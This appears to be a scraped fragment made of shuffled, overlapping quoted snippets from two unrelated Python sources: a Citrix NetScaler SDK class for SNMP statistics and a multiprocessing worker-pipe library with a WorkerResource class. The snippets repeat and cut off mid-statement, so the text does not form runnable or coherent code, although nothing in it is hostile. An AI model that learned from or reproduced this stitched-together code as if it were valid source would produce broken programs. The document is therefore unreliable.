snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for", "def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API to fetch the statistics", "e: raise e @property def snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which", "except Exception as e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs", "except Exception as e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter", "e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return", "this API to fetch the statistics of all snmp_stats resources that are configured", "the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as e: raise e @property", "as e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped", "2008-2015 Citrix Systems, Inc. # # Licensed under the Apache License, Version 2.0", "except Exception as e: raise e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs", "dropped because they referenced a user that was not known to the SNMP", "0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "0 self.message = \"\" self.severity = \"\" self.sessionid = \"\" self.snmp = [snmp_stats()", "return self._snmptottxpkts except Exception as e: raise e @property def snmptotparseerrs(self) : \"\"\"Number", "errors encountered when decoding received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception", "e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs that have been generated by", "= 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate =", "snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which were for an unsupported SNMP", "e: raise e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try", "e : raise e @classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this", "as e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try :", "an SNMP operation which was not allowed by the SNMP community named in", "(Default value = \"\") \"\"\" try : obj = snmp_stats() if not name", "= [] self.errorcode = 0 self.message = \"\" self.severity = \"\" self.sessionid =", "known to the SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception as e:", ": return self._snmpgetreqsrate except Exception as e: raise e @property def snmptotbadcommname(self) :", "self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse", "= 0 self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs =", "\"\"\"SNMP Get-Response PDUs that have been generated by the NetScaler.\"\"\" try : return" ]
[ "'''Blocking request status update from worker. ''' self.send_payload(StatusRequest()) return self.recv() ############### Pipe interface", "'proc', 'verbose'] def __init__(self, target: Callable = None, start: bool = False, args=None,", "is not None else dict() userfunc = UserFunc(target, *args, **kwargs) else: userfunc =", "Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) # start worker if", "self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal to", "= multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging),", "to Worker and then wait for it to die.''' if check_alive and not", "interface methods ############### def poll(self) -> bool: '''Check if worker sent anything. '''", "throws WorkerIsAliveError if already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def", "# def start(self, num_workers: int, *args, func: Callable = None, **kwargs): # if", "blocking return result upon reception. ''' self.send_data(data) return self.recv_data() def recv_data(self) -> Any:", "def get_status(self): '''Blocking request status update from worker. ''' self.send_payload(StatusRequest()) return self.recv() ###############", "self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) # start worker if requested", "handled by user function.''' return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func: Callable, *args, **kwargs):", "self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle incoming data", "# self.clear() # # def terminate(self): # [w.terminate() for w in self] #", "return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func: Callable, *args, **kwargs): '''Send a new UserFunc", "return self.recv().data def send_data(self, data: Any, **kwargs) -> None: '''Send any data to", "WorkerProcess class WorkerResource: '''Manages a worker process and pipe to it.''' __slots__ =", "multiprocessing import os from multiprocessing import Lock, Pipe, Pool, Process, Value from typing", "0 and all([w.is_alive() for w in self]) # # def start(self, num_workers: int,", "None else dict() userfunc = UserFunc(target, *args, **kwargs) else: userfunc = None ctx", "data: Any): '''Send data to worker and blocking return result upon reception. '''", "def __init__(self, target: Callable = None, start: bool = False, args=None, kwargs=None, logging:", "# return self # # def update_userfunc(self, userfunc: Callable): # return [w.update_userfunc(userfunc) for", "return result upon reception. ''' self.send_data(data) return self.recv_data() def recv_data(self) -> Any: '''Receive", "Process, Value from typing import Any, Callable, Dict, Iterable, List, NewType, Tuple, Union", "def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive(): self.start() return self def", "target: Callable = None, start: bool = False, args=None, kwargs=None, logging: bool =", "check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass return", "#self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process", "import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess import WorkerProcess", "worker if requested if start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if", "= None ctx = multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe,", "Lock, Pipe, Pool, Process, Value from typing import Any, Callable, Dict, Iterable, List,", "has running workers.') # # # start each worker # for ind in", "workers.') # # # start each worker # for ind in range(num_workers): #", "WorkerDiedError(self.proc.pid) # handle incoming data if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus): return payload", "# return [w.update_userfunc(userfunc) for w in self] # # ############### Low-Level Process Operations", "if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self, check_alive=True): '''Send SigClose() to", "**kwargs) -> None: '''Send any data to worker process to be handled by", "ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) # start worker if requested if start:", "Pool, Process, Value from typing import Any, Callable, Dict, Iterable, List, NewType, Tuple,", "= ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) # start worker if requested if", "isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage()", "then wait for it to die.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.join()',", "worker process and pipe to it.''' __slots__ = ['pipe', 'proc', 'verbose'] def __init__(self,", "self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list): # # ############### Worker Creation", "any data to worker process to be handled by user function.''' return self.send_payload(DataPayload(data,", "''' if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose: print(f'{self} sending: {payload}') try:", "DataPayload) or isinstance(payload, WorkerStatus): return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif", "(DataPayload or otherwise) to worker process. ''' if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid)", "or isinstance(payload, WorkerStatus): return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload,", "False, method: str = 'forkserver'): '''Open Process and pipe to it. ''' self.verbose", "*args, func: Callable = None, **kwargs): # if self.is_alive(): # raise ValueError('This WorkerPool", "and blocking return result upon reception. ''' self.send_data(data) return self.recv_data() def recv_data(self) ->", "= None, **kwargs): # if self.is_alive(): # raise ValueError('This WorkerPool already has running", "def send_payload(self, payload: BaseMessage) -> None: '''Send a Message (DataPayload or otherwise) to", "check_alive=True): '''Send SigClose() to Worker and then wait for it to die.''' if", "except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return received DataPayload or raise", "int, *args, func: Callable = None, **kwargs): # if self.is_alive(): # raise ValueError('This", "if requested if start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not", "UserFuncException, WorkerError, WorkerStatus) from .workerprocess import WorkerProcess class WorkerResource: '''Manages a worker process", "exception. ''' try: payload = self.pipe.recv() if self.verbose: print(f'{self} received: {payload}') except (BrokenPipeError,", "function.''' return self.recv().data def send_data(self, data: Any, **kwargs) -> None: '''Send any data", "bool = True, verbose: bool = False, method: str = 'forkserver'): '''Open Process", ".exceptions import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging import (BaseMessage, DataPayload, SigClose,", "None else tuple() kwargs = kwargs if kwargs is not None else dict()", "for w in self] # self.clear() # # def terminate(self): # [w.terminate() for", "worker process. ''' return self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self): '''Blocking request status update", "in self] # # ############### Low-Level Process Operations ############### # def join(self): #", "ValueError('This WorkerPool already has running workers.') # # # start each worker #", "try: self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal", "received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError): if self.verbose: print('caught one of (BrokenPipeError, EOFError,", "def join(self, check_alive=True): '''Send SigClose() to Worker and then wait for it to", "def execute(self, data: Any): '''Send data to worker and blocking return result upon", "bool = False, args=None, kwargs=None, logging: bool = True, verbose: bool = False,", "args=None, kwargs=None, logging: bool = True, verbose: bool = False, method: str =", "'forkserver'): '''Open Process and pipe to it. ''' self.verbose = verbose # set", "already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self, check_alive=True): '''Send", "to worker and blocking return result upon reception. ''' self.send_data(data) return self.recv_data() def", "else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property def pid(self): '''Get process id", "Any, Callable, Dict, Iterable, List, NewType, Tuple, Union from .exceptions import (UserFuncRaisedException, WorkerDiedError,", "from worker.''' return self.proc.pid def is_alive(self, *arsg, **kwargs): '''Get status of process.''' return", "status of process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the process, throws WorkerIsAliveError", "all([w.is_alive() for w in self]) # # def start(self, num_workers: int, *args, func:", "self.recv() ############### Pipe interface ############### def send_payload(self, payload: BaseMessage) -> None: '''Send a", "############### # def is_alive(self): # return len(self) > 0 and all([w.is_alive() for w", "############### def poll(self) -> bool: '''Check if worker sent anything. ''' return self.pipe.poll()", "typing import Any, Callable, Dict, Iterable, List, NewType, Tuple, Union from .exceptions import", "Callable = None, **kwargs): # if self.is_alive(): # raise ValueError('This WorkerPool already has", "is not None: args = args if args is not None else tuple()", "data to worker and blocking return result upon reception. ''' self.send_data(data) return self.recv_data()", "'''Return received DataPayload or raise exception. ''' try: payload = self.pipe.recv() if self.verbose:", "data if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus): return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True)", "Callable): # return [w.update_userfunc(userfunc) for w in self] # # ############### Low-Level Process", "to it. ''' self.verbose = verbose # set up userfunc if target is", "target is not None: args = args if args is not None else", "raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list): # # ############### Worker Creation ###############", "Operations ############### # def join(self): # [w.join() for w in self] # self.clear()", "update_userfunc(self, func: Callable, *args, **kwargs): '''Send a new UserFunc to worker process. '''", "try: payload = self.pipe.recv() if self.verbose: print(f'{self} received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError):", "process to be handled by user function.''' return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func:", "self.join() def __del__(self): if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ############### Main interface methods", "worker.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list):", "for w in self] # # ############### Low-Level Process Operations ############### # def", "print(f'{self} received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError): if self.verbose: print('caught one of (BrokenPipeError,", "and all([w.is_alive() for w in self]) # # def start(self, num_workers: int, *args,", "self.verbose = verbose # set up userfunc if target is not None: args", "return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive(): self.start() return self def __exit__(self, exc_type,", "data to worker process to be handled by user function.''' return self.send_payload(DataPayload(data, **kwargs))", "args is not None else tuple() kwargs = kwargs if kwargs is not", "check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list): # #", "worker # for ind in range(num_workers): # self.append(WorkerResource(ind, *args, func=func, **kwargs)) # #", "pipe to it.''' __slots__ = ['pipe', 'proc', 'verbose'] def __init__(self, target: Callable =", "data from user function.''' return self.recv().data def send_data(self, data: Any, **kwargs) -> None:", "[w.update_userfunc(userfunc) for w in self] # # ############### Low-Level Process Operations ############### #", "*arsg, **kwargs): '''Get status of process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the", "= args if args is not None else tuple() kwargs = kwargs if", "process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the process, throws WorkerIsAliveError if already", "(BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle incoming data if isinstance(payload, DataPayload) or", "= UserFunc(target, *args, **kwargs) else: userfunc = None ctx = multiprocessing.get_context(method) self.pipe, worker_pipe", "None ctx = multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc,", "print(f'{self} sending: {payload}') try: return self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) ->", "return self.proc.start() def join(self, check_alive=True): '''Send SigClose() to Worker and then wait for", "if args is not None else tuple() kwargs = kwargs if kwargs is", "(UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc,", "return self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return received DataPayload", "BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return received DataPayload or raise exception.", "# start each worker # for ind in range(num_workers): # self.append(WorkerResource(ind, *args, func=func,", "DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess import WorkerProcess class WorkerResource:", "worker and blocking return result upon reception. ''' self.send_data(data) return self.recv_data() def recv_data(self)", "a new UserFunc to worker process. ''' return self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self):", "WorkerStatus): return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException): raise", "not None else tuple() kwargs = kwargs if kwargs is not None else", "self]) # # def start(self, num_workers: int, *args, func: Callable = None, **kwargs):", "Pipe interface ############### def send_payload(self, payload: BaseMessage) -> None: '''Send a Message (DataPayload", "self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self): '''Blocking request status update from worker. ''' self.send_payload(StatusRequest())", "or otherwise) to worker process. ''' if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid) if", "self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the process, throws WorkerIsAliveError if already alive.''' if", "# if self.is_alive(): # raise ValueError('This WorkerPool already has running workers.') # #", "in self] # self.clear() # # def terminate(self): # [w.terminate() for w in", "not None: args = args if args is not None else tuple() kwargs", "return self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal to worker.''' if check_alive and", "UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess import WorkerProcess class WorkerResource: '''Manages a worker", "not self.is_alive(): self.start() return self def __exit__(self, exc_type, exc_value, exc_tb): self.join() def __del__(self):", "tuple() kwargs = kwargs if kwargs is not None else dict() userfunc =", "Callable = None, start: bool = False, args=None, kwargs=None, logging: bool = True,", "exc_type, exc_value, exc_tb): self.join() def __del__(self): if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ###############", "__repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive(): self.start() return self def __exit__(self,", "signal to worker.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate()", "is_alive(self, *arsg, **kwargs): '''Get status of process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start", "if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ############### Main interface methods ############### def poll(self)", "self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive(): self.start() return self", "self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose: print(f'{self} sending: {payload}') try: return self.pipe.send(payload) except", "raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True):", "if already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self, check_alive=True):", "import gc import multiprocessing import os from multiprocessing import Lock, Pipe, Pool, Process,", "recv_data(self) -> Any: '''Receive raw data from user function.''' return self.recv().data def send_data(self,", "elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise", "# # def update_userfunc(self, userfunc: Callable): # return [w.update_userfunc(userfunc) for w in self]", "''' self.send_payload(StatusRequest()) return self.recv() ############### Pipe interface ############### def send_payload(self, payload: BaseMessage) ->", "pid(self): '''Get process id from worker.''' return self.proc.pid def is_alive(self, *arsg, **kwargs): '''Get", "SigClose() to Worker and then wait for it to die.''' if check_alive and", "requested if start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive():", "self] # # ############### Low-Level Process Operations ############### # def join(self): # [w.join()", "def is_alive(self): # return len(self) > 0 and all([w.is_alive() for w in self])", "kwargs if kwargs is not None else dict() userfunc = UserFunc(target, *args, **kwargs)", "and pipe to it.''' __slots__ = ['pipe', 'proc', 'verbose'] def __init__(self, target: Callable", "*args, **kwargs)) def get_status(self): '''Blocking request status update from worker. ''' self.send_payload(StatusRequest()) return", ".messaging import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess import", "self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def terminate(self,", "raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self, check_alive=True): '''Send SigClose() to Worker and", "############### @property def pid(self): '''Get process id from worker.''' return self.proc.pid def is_alive(self,", "ConnectionResetError): if self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle", "[w.join() for w in self] # self.clear() # # def terminate(self): # [w.terminate()", "-> DataPayload: '''Return received DataPayload or raise exception. ''' try: payload = self.pipe.recv()", "-> None: '''Send any data to worker process to be handled by user", "from typing import Any, Callable, Dict, Iterable, List, NewType, Tuple, Union from .exceptions", "return self.proc.pid def is_alive(self, *arsg, **kwargs): '''Get status of process.''' return self.proc.is_alive(*arsg, **kwargs)", "**kwargs)) def get_status(self): '''Blocking request status update from worker. ''' self.send_payload(StatusRequest()) return self.recv()", "raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property def pid(self): '''Get process id from", "self def __exit__(self, exc_type, exc_value, exc_tb): self.join() def __del__(self): if self.verbose: print(f'{self}.__del__ was", "self.pipe.recv() if self.verbose: print(f'{self} received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError): if self.verbose: print('caught", "############### def send_payload(self, payload: BaseMessage) -> None: '''Send a Message (DataPayload or otherwise)", "worker. ''' self.send_payload(StatusRequest()) return self.recv() ############### Pipe interface ############### def send_payload(self, payload: BaseMessage)", "kwargs = kwargs if kwargs is not None else dict() userfunc = UserFunc(target,", "# # # start each worker # for ind in range(num_workers): # self.append(WorkerResource(ind,", "UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property def pid(self): '''Get process", "-> None: '''Send a Message (DataPayload or otherwise) to worker process. ''' if", "self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return received DataPayload or", "import Any, Callable, Dict, Iterable, List, NewType, Tuple, Union from .exceptions import (UserFuncRaisedException,", "__slots__ = ['pipe', 'proc', 'verbose'] def __init__(self, target: Callable = None, start: bool", "############### Process interface ############### @property def pid(self): '''Get process id from worker.''' return", "-> bool: '''Check if worker sent anything. ''' return self.pipe.poll() def execute(self, data:", "range(num_workers): # self.append(WorkerResource(ind, *args, func=func, **kwargs)) # # return self # # def", "kwargs is not None else dict() userfunc = UserFunc(target, *args, **kwargs) else: userfunc", "join(self, check_alive=True): '''Send SigClose() to Worker and then wait for it to die.'''", "methods ############### def poll(self) -> bool: '''Check if worker sent anything. ''' return", "True, verbose: bool = False, method: str = 'forkserver'): '''Open Process and pipe", "# [w.join() for w in self] # self.clear() # # def terminate(self): #", "payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ###############", "for it to die.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try:", "is not None else tuple() kwargs = kwargs if kwargs is not None", "# return len(self) > 0 and all([w.is_alive() for w in self]) # #", "def start(self): '''Start the process, throws WorkerIsAliveError if already alive.''' if self.proc.is_alive(): raise", "> 0 and all([w.is_alive() for w in self]) # # def start(self, num_workers:", "############### Pipe interface ############### def send_payload(self, payload: BaseMessage) -> None: '''Send a Message", "= ['pipe', 'proc', 'verbose'] def __init__(self, target: Callable = None, start: bool =", "one of (BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle incoming data if isinstance(payload,", "process, throws WorkerIsAliveError if already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start()", "return self.recv_data() def recv_data(self) -> Any: '''Receive raw data from user function.''' return", "pass return self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal to worker.''' if check_alive", "*args, func=func, **kwargs)) # # return self # # def update_userfunc(self, userfunc: Callable):", "or raise exception. ''' try: payload = self.pipe.recv() if self.verbose: print(f'{self} received: {payload}')", "from user function.''' return self.recv().data def send_data(self, data: Any, **kwargs) -> None: '''Send", "# start worker if requested if start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def", "None: args = args if args is not None else tuple() kwargs =", "# def is_alive(self): # return len(self) > 0 and all([w.is_alive() for w in", "dict() userfunc = UserFunc(target, *args, **kwargs) else: userfunc = None ctx = multiprocessing.get_context(method)", "from .messaging import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess", "to worker process. ''' return self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self): '''Blocking request status", "self.clear() # # def terminate(self): # [w.terminate() for w in self] # self.clear()", "= True, verbose: bool = False, method: str = 'forkserver'): '''Open Process and", "__exit__(self, exc_type, exc_value, exc_tb): self.join() def __del__(self): if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False)", "for ind in range(num_workers): # self.append(WorkerResource(ind, *args, func=func, **kwargs)) # # return self", "############### Main interface methods ############### def poll(self) -> bool: '''Check if worker sent", "Pipe, Pool, Process, Value from typing import Any, Callable, Dict, Iterable, List, NewType,", "'''Send data to worker and blocking return result upon reception. ''' self.send_data(data) return", "logging=logging), ) # start worker if requested if start: self.start() def __repr__(self): return", "NewType, Tuple, Union from .exceptions import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging", "return self.pipe.poll() def execute(self, data: Any): '''Send data to worker and blocking return", "verbose: bool = False, method: str = 'forkserver'): '''Open Process and pipe to", "self.start() return self def __exit__(self, exc_type, exc_value, exc_tb): self.join() def __del__(self): if self.verbose:", "data: Any, **kwargs) -> None: '''Send any data to worker process to be", "user function.''' return self.recv().data def send_data(self, data: Any, **kwargs) -> None: '''Send any", "None: '''Send a Message (DataPayload or otherwise) to worker process. ''' if not", "# # return self # # def update_userfunc(self, userfunc: Callable): # return [w.update_userfunc(userfunc)", "if self.verbose: print(f'{self} sending: {payload}') try: return self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def", "already has running workers.') # # # start each worker # for ind", "Callable, *args, **kwargs): '''Send a new UserFunc to worker process. ''' return self.send_payload(UserFunc(func,", "poll(self) -> bool: '''Check if worker sent anything. ''' return self.pipe.poll() def execute(self,", "WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True): '''Send", "import os from multiprocessing import Lock, Pipe, Pool, Process, Value from typing import", "= 'forkserver'): '''Open Process and pipe to it. ''' self.verbose = verbose #", "self.is_alive(): # raise ValueError('This WorkerPool already has running workers.') # # # start", "''' try: payload = self.pipe.recv() if self.verbose: print(f'{self} received: {payload}') except (BrokenPipeError, EOFError,", "__enter__(self): if not self.is_alive(): self.start() return self def __exit__(self, exc_type, exc_value, exc_tb): self.join()", "called!') self.terminate(check_alive=False) ############### Main interface methods ############### def poll(self) -> bool: '''Check if", "'''Get status of process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the process, throws", "import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging import (BaseMessage, DataPayload, SigClose, StatusRequest,", "def start(self, num_workers: int, *args, func: Callable = None, **kwargs): # if self.is_alive():", "__init__(self, target: Callable = None, start: bool = False, args=None, kwargs=None, logging: bool", "and pipe to it. ''' self.verbose = verbose # set up userfunc if", "def __enter__(self): if not self.is_alive(): self.start() return self def __exit__(self, exc_type, exc_value, exc_tb):", "get_status(self): '''Blocking request status update from worker. ''' self.send_payload(StatusRequest()) return self.recv() ############### Pipe", "alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self, check_alive=True): '''Send SigClose()", "received DataPayload or raise exception. ''' try: payload = self.pipe.recv() if self.verbose: print(f'{self}", "Iterable, List, NewType, Tuple, Union from .exceptions import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage)", "be handled by user function.''' return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func: Callable, *args,", "it. ''' self.verbose = verbose # set up userfunc if target is not", "interface ############### def send_payload(self, payload: BaseMessage) -> None: '''Send a Message (DataPayload or", "self.recv_data() def recv_data(self) -> Any: '''Receive raw data from user function.''' return self.recv().data", "# def join(self): # [w.join() for w in self] # self.clear() # #", "############### Low-Level Process Operations ############### # def join(self): # [w.join() for w in", "if self.is_alive(): # raise ValueError('This WorkerPool already has running workers.') # # #", "wait for it to die.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid)", "UserFunc to worker process. ''' return self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self): '''Blocking request", "**kwargs): # if self.is_alive(): # raise ValueError('This WorkerPool already has running workers.') #", "id from worker.''' return self.proc.pid def is_alive(self, *arsg, **kwargs): '''Get status of process.'''", "# raise ValueError('This WorkerPool already has running workers.') # # # start each", "raw data from user function.''' return self.recv().data def send_data(self, data: Any, **kwargs) ->", "kwargs=None, logging: bool = True, verbose: bool = False, method: str = 'forkserver'):", "return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e)", "args if args is not None else tuple() kwargs = kwargs if kwargs", "userfunc: Callable): # return [w.update_userfunc(userfunc) for w in self] # # ############### Low-Level", "else: userfunc = None ctx = multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True) self.proc =", "Main interface methods ############### def poll(self) -> bool: '''Check if worker sent anything.", "sending: {payload}') try: return self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload:", "die.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError:", "if worker sent anything. ''' return self.pipe.poll() def execute(self, data: Any): '''Send data", "# ############### Low-Level Process Operations ############### # def join(self): # [w.join() for w", "from worker. ''' self.send_payload(StatusRequest()) return self.recv() ############### Pipe interface 